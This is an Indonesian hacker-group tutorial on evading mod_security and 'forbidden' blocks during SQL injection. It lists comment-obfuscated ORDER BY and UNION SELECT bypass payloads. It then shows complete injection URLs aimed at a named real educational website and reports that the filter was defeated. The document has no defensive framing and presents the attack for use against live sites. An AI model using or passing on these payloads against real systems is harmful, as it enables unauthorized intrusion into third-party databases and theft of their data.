Cara Bypass SQL Forbidden
hello welkombek sama gua ShutDown yah maaf udah lama gua gak buat tutorial, sekarang gua mau ngasih tutorial soal sql-injection nih tapi tentang nge bypass nih pas kalian meng-inject website terus forbidden apapun atau terkena Mod_security disini gua mau kasih cara Bypass nya. Oke terobos aja.
1. Persiapan
• Website yang sudah ter-inject sqli oleh kalian/website target siap eksekusi.
2. Exploit bypass SQL-nya
• Exploit bypass ORDER+BY:
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
• Exploit bypass UNION+SELECT
/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/
3. Step by Step
• Ini target gua:
https://www.fpo.edu.ng/single-news.php?id=127
• Lalu gua inject seperti ini:
https://www.fpo.edu.ng/single-news.php?id=127+order+by+1,2,3,4,5,6,7,8,9,10--+-
Seperti yang kalian tau kalau Nemu erorr nya maka dikurangi satu digit.
• Lalu gua coba pake UNION+SELECT biasa dulu, seperti ini:
https://www.fpo.edu.ng/single-news.php?id=-127+union+select+1,2,3,4,5,6,7,8,9--+-
Dan hasilnya forbidden seperti ini:
• Lalu kita terobos pakai bypass UNION+SELECT yang di atas, seperti ini:
https://www.fpo.edu.ng/single-news.php?id=-127+/*!12345union*/+/*!select*/+1,2,3,4,5,6,7,8,9--+-
Dan hasilnya:
Hehehe sudah ter bypass deh jadi bisa di terobos.
Oke segitu aja dulu tutorial dari gua ShutDown kalau ada kesalahan mohon maaf, keep Humble
Thanks To:
• Midnight Attacker Team
• Anon Roz Team
• Indonesian Error System
FB:
@Midnight Attacker Team
IG:
@midnight.attacker